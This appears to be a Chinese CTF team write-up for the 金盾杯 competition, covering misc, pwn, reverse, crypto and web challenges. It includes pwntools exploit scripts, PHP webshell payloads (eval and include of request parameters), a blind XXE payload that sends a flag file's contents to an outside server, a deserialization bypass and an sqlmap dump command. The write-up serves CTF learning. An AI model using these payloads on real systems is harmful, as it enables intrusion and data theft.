金盾杯团队wp
Misc
Misc-qianda0_Sudoku
这道题很像西湖论剑的数独题,但是补全后却不知道该怎么办了
然后相到了二进制,把有数字的补位1,没有的补位0
最后可以得到
011100110111010101100100001100000110101101110101010111110110011001110101010011100
然后转asciall
得到flag{sud0ku_fuN};
Misc-盗梦空间
下载后得到一串密码
PB5CMZCPGU7GSJKNJRDUQYJFMZJE24BSIR3TGI3TJ55FGQ2GERJGIWDAJBHTK2BVIFIDKNZ2LJKFKND2L5QX42B6HJJFA7LLLBHUE4S5MZTDYTRTLFAHUVBMFN5SWQLLLZRWQ6SHO5CTMXRYKV5FMLSCLEUWSWBQJI2VGOR4JE5UYUKQPRXTWJLUJB3TWVKZFM3F6WTRJYRFC432KVEC4ILYKRTTCQTFKBWTAYSNN5XTE2TKMBSHWNSFNQQVURCZO55G6OZUFNKSIOJRGA2EYYKOMJMXK3TYIB4UWZLRJ54GUTLWFJWEWTLKMR6TKJSHOUYWMKS7IUUWMMDXL5QUC2KJEQWE4R2VFJCQ====
先进行base32解码得到
xz&dO5>i%MLGHa%fRMp2Dw3#sOzSCF$RdX`HO5h5AP57:ZTU4z_a~h>:RP}kXOBr]ff<N3Y@zT,+{+Ak^chzGwE6^8UzV.BY)iX0J5S:<I;LQP|o;%tHw;UY+6_ZqN"QszUH.!xTg1BePm0bMoo2jj`d{6El!ZDYwzo;4+U$9104LaNbYunx@yKeqOxjMv*lKMjd}5&Gu1f*_E)f0w_aAiI$,NGU*E
然后base91解密得到
R2REQ2VHZDQ2ZUdkNDNkR2MrX2JHZDQ2ZUdjKz9YR2Q0NmVHZDQzWkdkNDNoR2NffGJHZDQzZkdkNDZlR2Q0M2hHYytfWUdkNDNoR2Q0M2RHYys/WUdkNDNkR2REOWZHZDQ2ZkdjK19hR2MrP2ZHZERDY0dkNDNmR2Q0M1pHZDQ2Y0dkNDNl
再进行base64得到
GdDCeGd46eGd43dGc+_bGd46eGc+?XGd46eGd43ZGd43hGc_|bGd43fGd46eGd43hGc+_YGd43hGd43dGc+?YGd43dGdD9fGd46fGc+_aGc+?fGdDCcGd43fGd43ZGd46cGd43e
再进行base85
7D6E654D6E416E616954676E694A69654265766F4C497B67616C66
再进行base16得到
}neMnAnaiTgniJieBevoLI{galf
最后队字符串进行逆序
得到flag{ILoveBeiJingTianAnMen}
Misc-数据泄露01-账号泄露追踪
最初一直再github搜red banana 找了很长时间都没找到
然后再提示里面看到这句话
然后搜hongxiangjiao
发现就只有一个
查看这个项目所有文件,在里面搜已经给的用户名
在scrubbers.py这里搜到了
Misc-数据泄露02-泄露的密码
在项目里面没有找到密码
然后这里说了可能在博客园,和csdn
然后最先去搜项目作者的博客
在博客园找到了作者的博客
里面只有一篇文章
可以得到密码
flag{redbanana2022sss}
Misc-数据泄露03-泄露的密钥
在第二道题目中有一个参考链接
访问时一篇知乎文章
然后访问作者主页
里面有很多关于hongxiangjiao的文章
访问文章,在第一篇文章里面可以得到
flag{51d0a99c-752e-11ed-b5a7-44af28a75237}
Pwn
Pwn-login
主程序
这道题有后门函数,再加上没开pie canary,利用leave指令打一个栈迁移到bss
from pwn import*
import base64
p=remote('59.110.213.14', 53598)
context.log_level='debug'
p.recvuntil('Authenticate : ')
sys_addr=0x08049284
input_addr=0x0811EB40
payload=b'aaaa'+p32(sys_addr)+p32(input_addr)
p.sendline(base64.b64encode(payload))
p.interactive()
Pwn-wtf
主要有一个强转换来执行溢出
还有一个重要的点就是这个题没有设置缓冲区,需要你把全缓冲消耗完,在结合py文件所需的条件
from pwn import *
p=remote('59.110.213.14', 59123)
context.log_level='debug'
p.recvuntil('payload please : ')
poc=b'-1'+b'\n'*4094+b'a'*0x38+p64(0x4005F4)+b'\n'
p.sendline(poc.encode("hex"))
print(p.recvall())
Reverse
Reverse-tea
Xxtea加密
密钥
脚本
- #include <stdio.h>
- #include <stdint.h>
- #define DELTA 0x9e3779b9
- #define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))
- void btea(uint32_t *v, int n, uint32_t const key[4])
- {
- uint32_t y, z, sum;
- unsigned p, rounds, e;
- rounds = 6 + 52 / n;
- sum = rounds*DELTA;
- y = v[0];
- do
- {
- e = (sum >> 2) & 3;
- for (p = n - 1; p>0; p--)
- {
- z = v[p - 1];
- y = v[p] -= MX;
- }
- z = v[n - 1];
- y = v[0] -= MX;
- sum -= DELTA;
- } while (--rounds);
- }
- int main()
- {
- uint32_t v[9]=
- {
- 0x6456DD95, 0x2A41FD67, 0xAFE574A5,
- 0x4BFA8D72, 0xE2BF316F, 0x166B34BD,
- 0x6232283A,0x4A1A8794, 0xD591779B
- };
- uint32_t const k[4]=
- {
- 0x5571CB4E, 0xC38A9D2F, 0x1D835B62,0x93C3DC19
- };
- int n = 9;
- btea(v, n, k);
- for (int i = 0; i < n; i++)
- {
- for (int j = 0; j < sizeof(uint32_t) / sizeof(uint8_t); j++)
- {
- printf("%c", (v[i] >> (j * 8)) & 0xFF);
- }
- }
- return 0;
- }
flag{3430DF69-C220-40F9-9667-2B8C4A2FE6E9}
Crypto
Crypto-simpleR
这道题只给了e和密文,并且e很小只等于2,相当于把明文m平方,利用大数库开方
脚本
- import gmpy2
- import libnum
- c=3136716033731914452763044128945241240021620048803150767745968848345189851269112855865110275244336447973330360214689062351028386721896599362080560109450218446175674155425523734453425305156053870568600329
- m = gmpy2.isqrt(c)
- m = int(m)
- m_text = libnum.n2s(m)
- print(m_text)
flag{efd90a18-7601-11ed-ac93-44af28a75237}
Crypto-RRSSAA
题目给了p、q,e1,e2,c1,c2,并且e1=2333,e2=23333,e1和e2互质
一眼共模
脚本
- #coding:utf-8
- import gmpy2
- import libnum
- p=123458435421261543472541524199731235574048053128601592828113156858256897602409067025674231465244054181972626266583815939142097971979228583114373452753144521115603696730578184251357134599421315099599143482519027549135311948601114584919768962463801005587816375776795616009077822359851656097169247116759791793687
- q=97276963771653114294115524925680580949385827322024790734418230303283861043696849155355518555652095559285163994241670550744000225618126658988929239870027266570376465899405972982196485923500560008192041570421590766719044249315069438249987024660117501456707638758202318116109860915440658403715058758393977149729
- n=p*q
- e1=2333
- c1=3091063916228464455521357922299851945733179824012337598325935431151534388234889582934719097957211574031506425780821664489121712504278835046257494105641946435467664631146730786295351188439182841680768531937382787335943965667714937822280848763425350089235645289384375623655179569897238696408868150422651859781815376696756981788347283996647604511187607188051598692339333337644956875630361418916795600637518633591481197783209020148212167599700531242494401774503456200889355439781332887736926823527200546226966803759767490748143939212274369822333951327997518975975960530675198444178464821237247544413301735105551687502988
- n2=10509135007927020910961570498020654777820601579825669027410027026173076573380693204454238919762243178647774720169342528691085983225219960236799370268896666867164869238677749575679762611540687182614629847614275763451130215062534086871119259415866636857654106010518677919485438729877453549868724935457349692430637646827845074169704597756894678350214029352130966923159025112991395150214022844221949818486992653054085916326074567355928744181958934887632087019273037034539054980148783728604561167417571308543568511557184742388987903995431328908643666134429145944816840592528868078022503367301892068877343146684216682292031
- e2=23333
- c2=3020828772115226887000015133333821282592051548686903232559679837758040530392014545308146746971372113818852623844807332306519066119345705458457237902473211958279079988876840270162881686132679217898982958235064386584289972304614458185165683014776410738885399792032602501638437880558924737680288329872135075375340246371405482850885777367009879733890398886462506917356919767329145462495699851367240387357485822078838863882442289942481376842591016730244281710044592948116573144325447524357995553176271890557769659239135878101020400056503293673886968120697821156927485992635172356908737486318910095798432613528160497925715
- #共模攻击
- #共模攻击函数
- def rsa_gong_N_def(e1,e2,c1,c2,n):
- e1, e2, c1, c2, n=int(e1),int(e2),int(c1),int(c2),int(n)
- print("e1,e2:",e1,e2)
- print(gmpy2.gcd(e1,e2))
- s = gmpy2.gcdext(e1, e2)
- print(s)
- s1 = s[1]
- s2 = s[2]
- if s1 < 0:
- s1 = - s1
- c1 = gmpy2.invert(c1, n)
- elif s2 < 0:
- s2 = - s2
- c2 = gmpy2.invert(c2, n)
- m = (pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n
- return int(m)
- m = rsa_gong_N_def(e1,e2,c1,c2,n)
- print(m)
- print(libnum.n2s(int(m)).decode())
flag{m-co-pr1m3}
Crypt-小蔡一碟
附件给了p,q,e,c,直接套脚本:
import gmpy2
import binascii
e = 19999
c = 15176702963665501922403999221895690215282504333559191936777611319802899006788248557279808041449600021838150559750953924442905812928090845724972302802437464578850548068341807388913597120410841772162320682183999897958037105171055839318049584110106368746019307718322196559113348222485399508199250407930454163630320204931310511881428526650112302088935473691025195368688328619506405195638348814876023324965555774105055157166629768444387302211760448217666053342945412276047036106026882600555168611384975424201854134312678053294600373283558738680924405596407956073538019064806588050349192904553467435863806385634189342027395
q = 172887845783422002789082420254687566789308973977854220003084208506942637236520298084569310184947609392615644191634749946917611949170216103380692838274627779684269566710195695515000492922000964163572308396664983937642827715821977706257150587395323556335081542987902463903436949141288429937432819003811354533477
p = 159303842369547814925693476555868814571858842104258697105149515713993443203825659998652654127374510196025599003730143012113707484839253123496857732128701609968752699400092431858926716649428960535283324598902169712222454699617671683675932795780343545970625533166831907970102480122242685830820463772025494712199
n = p*q
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = gmpy2.powmod(c, d, n)
print(binascii.unhexlify(hex(m)[2:]))
得出flag:
flag{TheFIFAWorldCupQatar2022}
Crypto-rand
考察伪随机数,附件给了时间戳,再次异或得到flag,编写脚本:
import random
import time
random.seed(1670639450.0)
for i in range(3):
rand = random.randint(0,10**30)
a = rand^881235169941718345882433419366
print(a)
flag = 0
en = flag ^ rand
dt = "2022-12-10 10:30:50"
# print(0^rand)
timeArray = time.strptime(dt, "%Y-%m-%d %H:%M:%S")
timestamp = time.mktime(timeArray)
第一行数字就是flag:
flag{659480394773869512498389750739}
Web
Web-ezPHP
index.php.bak源码泄露
有长度限制,黑名单,以及函数禁用,没有过滤include,用payload写入文件
GET:?f[name=/var/www/html/a.php
POST:f_content=<?=include$_POST[1];
访问写入的文件,用data伪协议写入命令,popen没有被过滤,使用popen读取flag
1=data://text/plain,<?php popen('cat /usr/f*>aa','r');?>
访问aa文件,得到flag:
flag{9edfcb1c-da98-429e-ac24-d67cfc13f3db}
Web-ezphp2
题目中给了源码,源码中有长度限制以及敏感字符过滤,写入phpinfo()查看函数禁用:
GET:?name[nnnn=a.php
POST:file_c=<?=phpinfo();
查看一番没有禁用eval,直接写马,注意长度限制,短标签绕过黑名单:
GET:?name[nnnn=a.php
POST:file_c=<?=eval($_GET[1]);
懒得测还有什么没有被过滤,直接构造木马连接蚁剑,payload为:
/Upld0d/a.php?1=eval($_POST[1]);
连接蚁剑在根目录下找到flag。flag为
flag{ddbc0dca-487b-4b14-a8c9-7eb6e0f4bd9b}
Web-有来无回
题目描述访问xxe.php,访问文件给了提示,需要盲注,flag文件在/tmp/flag.txt里,使用伪协议读取flag,在vps上创建dtd文件,同时开启监听,将flag外带到我们的公网服务器上,payload为:
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/flag.txt">
<!ENTITY % aaa SYSTEM "http://xilitter.top/test.dtd">
%aaa;
] >
在vps上创建test.dtd,内容为:
<!ENTITY % dtd "<!ENTITY % xxe SYSTEM 'http://1.116.160.155:2399/%file;'> ">
%dtd;
%xxe;
发包,同时开启监听,最后在数据包头带出base编码,解码得到flag。flag为:
flag{tqxh8rvijg4jibuxuzfaarvq8esu24uz}
Web-反败为胜
一段加密字符串,源代码给了加密方式和密钥,RC4和0626,在线网站解码得到题目源代码。代码要求ser_code == "FLAG",考察php反序列化,需绕过wake_up函数,exp为;
<?php
class ouo{
private $ser_code = "ser";
public function __construct(){
$this->ser_code = "FLAG";
}
}
$a = new ouo();
$str = serialize($a);
$str2 = str_replace(':1:', ':2:',$str);
echo urlencode($str2);
生成的序列化串为:
O%3A3%3A%22ouo%22%3A2%3A%7Bs%3A13%3A%22%00ouo%00ser_code%22%3Bs%3A4%3A%22FLAG%22%3B%7D
访问ser.php添加cookie上传,payload为;
cookie:SER=O%3A3%3A%22ouo%22%3A2%3A%7Bs%3A13%3A%22%00ouo%00ser_code%22%3Bs%3A4%3A%22FLAG%22%3B%7D
发包得到flag:
flag{30815ff8-76c2-11ed-aec4-44af28a75237}
Web-SQL
算非预期,直接脚本一把索,提交id发现几乎所有的敏感字符都被过滤了。或者说转义了,用sqlmap中的一个脚本chardoubleencode.py,它可以对我们提交的payload二次编码,尝试能否绕过成功,发现真的可以爆出数据库,直接爆表,payload为:
python sqlmap.py -u http://59.110.213.14:43502/?id=1 --tamper=chardoubleencode.py --dbs -D sqlll --dump
直接跑出flag,flag为:
flag{e4cf1b90-75d1-11ed-9b3b-44af28a75237}
Web-skip
国外的一道原题,链接为:SECCON CTF 2022 Quals Writeup - Satoooonの物置 (hatenablog.com)
提交一千以上的参数可以拒绝nginx的包含,直接用链接中的payload:
import requests
r = requests.get("http://59.110.213.14:53919/?" + "proxy=1&" * 1000).text
print(r)
运行成功得到flag:
flag{abe2ff50ebbc889f8b341fa53fd792e3}